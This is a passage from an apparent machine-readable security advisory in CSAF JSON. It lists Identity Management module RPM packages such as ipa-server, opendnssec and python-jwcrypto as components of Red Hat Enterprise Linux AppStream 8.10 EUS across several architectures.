"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client"
},
"product_reference": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1"
},
"product_reference": "ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client"
},
"product_reference": "ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client"
},
"product_reference": "ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1"
},
"product_reference": "python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client"
},
"product_reference": "python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client"
},
"product_reference": "python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client"
},
"product_reference": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
